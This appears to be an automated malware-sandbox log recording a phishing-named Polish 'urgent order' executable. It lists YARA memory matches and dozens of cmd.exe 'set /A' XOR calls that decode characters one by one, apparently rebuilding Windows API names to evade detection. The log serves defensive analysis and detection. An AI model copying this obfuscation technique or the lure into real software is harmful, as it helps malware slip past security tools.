Source: Yara match	File source: 00000001.00000002.14100531174.00000000058D8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe PID: 4904, type: MEMORYSTR

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
